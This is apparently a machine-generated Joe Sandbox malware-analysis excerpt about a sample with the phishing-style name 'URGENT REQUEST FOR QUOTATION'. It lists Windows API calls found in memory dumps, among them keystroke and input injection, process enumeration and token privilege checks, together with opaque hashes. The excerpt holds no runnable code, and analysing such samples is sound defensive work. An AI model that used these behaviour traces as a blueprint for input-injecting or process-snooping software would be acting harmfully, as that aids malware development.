                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$socket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1881357543-0
                                                                                                                      • Opcode ID: 240546d734cd3f75508afdc71f2e04d158f5b180d7e9cc6296c17d9946074e7f
                                                                                                                      • Instruction ID: 9ca24553d255b019ba9f5cb59a98beb737b2e6ae54404a02a665defd4d0b7956
                                                                                                                      • Opcode Fuzzy Hash: 240546d734cd3f75508afdc71f2e04d158f5b180d7e9cc6296c17d9946074e7f
                                                                                                                      • Instruction Fuzzy Hash: 4341B1746002006FE720AF24C886FAA77E5EB44718F948458FA1A9F3D3D772DD418B90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7bea6a918cfcca3bfed806a33a993de92fe72bf0bafb5040aa2562c926fb6cd6
                                                                                                                      • Instruction ID: f84582c5a524341afeb7efa5a6551d9c75ebc2360e0ecbf56e022dd05fe19161
                                                                                                                      • Opcode Fuzzy Hash: 7bea6a918cfcca3bfed806a33a993de92fe72bf0bafb5040aa2562c926fb6cd6
                                                                                                                      • Instruction Fuzzy Hash: 074119B1A00714BFD724AF38CC41BEABBEAEF84710F10852AF556DB2D2D77599418790
                                                                                                                      APIs
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000A5783
                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 000A57A9
                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000A57CE
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000A57FA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3321077145-0
                                                                                                                      • Opcode ID: 11ff9685375bbcc58648b2a2a1d8bc87bbfbfaa8a464170bfb97f625748ce81f
                                                                                                                      • Instruction ID: 4f0ac46ae9fbf4ffc90e43080fd5970aabd977cc971a3731da5a5fe88a8ae643
                                                                                                                      • Opcode Fuzzy Hash: 11ff9685375bbcc58648b2a2a1d8bc87bbfbfaa8a464170bfb97f625748ce81f
                                                                                                                      • Instruction Fuzzy Hash: 07413E39600A10DFDB25DF55C444A5DBBE5FF49321F188488E84AAB362CB74FD01CB91
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00056D71,00000000,00000000,000582D9,?,000582D9,?,00000001,00056D71,8BE85006,00000001,000582D9,000582D9), ref: 0006D910
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006D999
                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0006D9AB
                                                                                                                      • __freea.LIBCMT ref: 0006D9B4
                                                                                                                        • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2652629310-0
                                                                                                                      • Opcode ID: 20b6e46a375e418717ab47178804057c03b636f841cfb45c7a75ceedcb7fc7a2
                                                                                                                      • Instruction ID: 9bff75bbb65425934817ff584f8020d5da37f28b04ecf4eb17eb4ac2e3a08b6f
                                                                                                                      • Opcode Fuzzy Hash: 20b6e46a375e418717ab47178804057c03b636f841cfb45c7a75ceedcb7fc7a2
                                                                                                                      • Instruction Fuzzy Hash: 0031AD72A0020AABEF259F65DC45EEF7BA6EB41310B05416AFC08D7291EB35CD54CBA0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 000C5352
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C5375
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C5382
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000C53A8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3340791633-0
                                                                                                                      • Opcode ID: eb063d5704efe806c980da6b655c440f4e12b193fdc8fd0d479d3d0183af9edd
                                                                                                                      • Instruction ID: 6b086df7715d862ea9fae2cce252366979d28267ed05fe02aaafc807145ae4e0
                                                                                                                      • Opcode Fuzzy Hash: eb063d5704efe806c980da6b655c440f4e12b193fdc8fd0d479d3d0183af9edd
                                                                                                                      • Instruction Fuzzy Hash: 7031B238B55A88AFEB709B14CC05FEC77A5AB04392F58410AFA51961E2C7B4BBC09B41
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0009ABF1
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 0009AC0D
                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 0009AC74
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0009ACC6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: 2f193df8491f5a4c238148f864e434510fce631da61cfc06de156d7250baf388
                                                                                                                      • Instruction ID: 2c3ec746e1f28ab5756165947c12a4314cf1ba7882c4f6a084e9368e193ec3d2
                                                                                                                      • Opcode Fuzzy Hash: 2f193df8491f5a4c238148f864e434510fce631da61cfc06de156d7250baf388
                                                                                                                      • Instruction Fuzzy Hash: 6A3106B0B046186FFF35CB65CC04BFE7BE5AB8A321F04461AE4859A1D1C3798985A7D2
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 000C769A
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000C7710
                                                                                                                      • PtInRect.USER32(?,?,000C8B89), ref: 000C7720
                                                                                                                      • MessageBeep.USER32(00000000), ref: 000C778C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352109105-0
                                                                                                                      • Opcode ID: 14af9ab6cd3e6dcc0161762e49419115f5c5b76f942ace82172e09d0f6da11aa
                                                                                                                      • Instruction ID: eaa1fb6d56119dc77ba2f80312ce49cfc3893fc71c19094aabfbcb89a3fef6fb
                                                                                                                      • Opcode Fuzzy Hash: 14af9ab6cd3e6dcc0161762e49419115f5c5b76f942ace82172e09d0f6da11aa
                                                                                                                      • Instruction Fuzzy Hash: 9A419C34609218AFDB51CF68C898FAD77F4BB48304F1882ACE4589B2A1C374A981CF90
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 000C16EB
                                                                                                                        • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                                                                                                        • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                                                                                                        • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                                                                                                      • GetCaretPos.USER32(?), ref: 000C16FF
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 000C174C
                                                                                                                      • GetForegroundWindow.USER32 ref: 000C1752
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2759813231-0
                                                                                                                      • Opcode ID: 45978b0a0f60b25fd3efcfe7a2bbe72a10113a11e4e6a8d139c6a3545d52fd8a
                                                                                                                      • Instruction ID: bc3ab090f351f151e8d7821f02604cd360b918b05cb1d28ee6586bdd5cc126f6
                                                                                                                      • Opcode Fuzzy Hash: 45978b0a0f60b25fd3efcfe7a2bbe72a10113a11e4e6a8d139c6a3545d52fd8a
                                                                                                                      • Instruction Fuzzy Hash: 22315E75D04249AFDB04EFA9C881DEEBBFDEF49304B5080A9E419E7212D6319E45CFA0
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0009D501
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0009D50F
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0009D52F
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0009D5DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 420147892-0
                                                                                                                      • Opcode ID: 41651fd91efe0b8e9af7ca76da63335a2be8b908585700ce705d4c5829cf5f4e
                                                                                                                      • Instruction ID: d0d3072cf855d5879fce946656e465ba494c6f3fa5ec470c84509812d43f047b
                                                                                                                      • Opcode Fuzzy Hash: 41651fd91efe0b8e9af7ca76da63335a2be8b908585700ce705d4c5829cf5f4e
                                                                                                                      • Instruction Fuzzy Hash: 2731A4711083009FD701EF54C881EAFBBF8EFD9354F54092DF585861A2EB719945CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                                                      • GetCursorPos.USER32(?), ref: 000C9001
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00087711,?,?,?,?,?), ref: 000C9016
                                                                                                                      • GetCursorPos.USER32(?), ref: 000C905E
                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00087711,?,?,?), ref: 000C9094
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2864067406-0
                                                                                                                      • Opcode ID: 82bd185476148864771cd8e55974df4087db3ea4d030abc67abf04812ccd79c1
                                                                                                                      • Instruction ID: 31fe7bff27e73371338bb172d6dd8d8ab8892d87415811b3e1e8b6cf347743c5
                                                                                                                      • Opcode Fuzzy Hash: 82bd185476148864771cd8e55974df4087db3ea4d030abc67abf04812ccd79c1
                                                                                                                      • Instruction Fuzzy Hash: 67219C35600118FFDB258F94C858FEE7BF9EB89350F244069F9058B2A1C3759990DB60
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNEL32(?,000CCB68), ref: 0009D2FB
                                                                                                                      • GetLastError.KERNEL32 ref: 0009D30A
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0009D319
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,000CCB68), ref: 0009D376
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2267087916-0
                                                                                                                      • Opcode ID: 0d43c37b0eda9e6b3d6f35f28eead766cee2030fb2efa15efb2f06a314d8812f
                                                                                                                      • Instruction ID: 3514d33584b73f11b46aea954a1fd1f59d59fb59b1af040dc19ec16f4125f7f0
                                                                                                                      • Opcode Fuzzy Hash: 0d43c37b0eda9e6b3d6f35f28eead766cee2030fb2efa15efb2f06a314d8812f
                                                                                                                      • Instruction Fuzzy Hash: E121A370548201DF9B10DF24C8818AE77E8EF55365F508A1EF499C72A2DB30DA46DB93
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00091014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0009102A
                                                                                                                        • Part of subcall function 00091014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00091036
                                                                                                                        • Part of subcall function 00091014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091045
                                                                                                                        • Part of subcall function 00091014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0009104C
                                                                                                                        • Part of subcall function 00091014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091062
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000915BE
                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 000915E1
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00091617
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0009161E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1592001646-0
                                                                                                                      • Opcode ID: e29a44cf82c6553f8ce4fa7ca65fe5347da4b050ddecbb8f5df33308d8d2b558
                                                                                                                      • Instruction ID: 9127330d878047bf95791e07e9383d4ef5514a538536e009921ca6a5a8336c11
                                                                                                                      • Opcode Fuzzy Hash: e29a44cf82c6553f8ce4fa7ca65fe5347da4b050ddecbb8f5df33308d8d2b558
                                                                                                                      • Instruction Fuzzy Hash: 5F218C31E4410AEFEF00DFA4C949BEEB7F8EF44344F194459E445AB241E774AA05EBA0
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 000C280A
                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000C2824
                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000C2832
                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 000C2840
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2169480361-0
                                                                                                                      • Opcode ID: 3369e3992b17e2cc2f57bac3b36a087ab1d6a3df3f9cfde11ca5d918f06fac6e
                                                                                                                      • Instruction ID: fd27a1d20b364e05cb875fa24d24a7aa4276b9f576eb43986e30a712551f43ed
                                                                                                                      • Opcode Fuzzy Hash: 3369e3992b17e2cc2f57bac3b36a087ab1d6a3df3f9cfde11ca5d918f06fac6e
                                                                                                                      • Instruction Fuzzy Hash: 0C21D631209511AFE714DB24C844FAE7799AF45324F14825CF41ACBAE2CB75FC82C790
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00098D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?), ref: 00098D8C
                                                                                                                        • Part of subcall function 00098D7D: lstrcpyW.KERNEL32(00000000,?,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00098DB2
                                                                                                                        • Part of subcall function 00098D7D: lstrcmpiW.KERNEL32(00000000,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?), ref: 00098DE3
                                                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097923
                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097949
                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097984
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                      • String ID: cdecl
                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                      • Opcode ID: 53a0c6882325b8d332d0cbebaf9aa9bfd5eb7e70dd9ff3755802b3c2e5ef8e6e
                                                                                                                      • Instruction ID: bad0bdd28ddc465f64428c6573750e1f4c3cb7f67ce4bc9b04aa661c993438ef
                                                                                                                      • Opcode Fuzzy Hash: 53a0c6882325b8d332d0cbebaf9aa9bfd5eb7e70dd9ff3755802b3c2e5ef8e6e
                                                                                                                      • Instruction Fuzzy Hash: 4011067A210202AFDF159F35D844E7B77E5FF85350B10402AF90ACB265EF319801D751
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C7D0B
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 000C7D2A
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000C7D42
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000AB7AD,00000000), ref: 000C7D6B
                                                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 847901565-0
                                                                                                                      • Opcode ID: 03274e1cd506667f71c37d26ef17afe7ebafdf5b0fbeeaaff4a4205c533c57a1
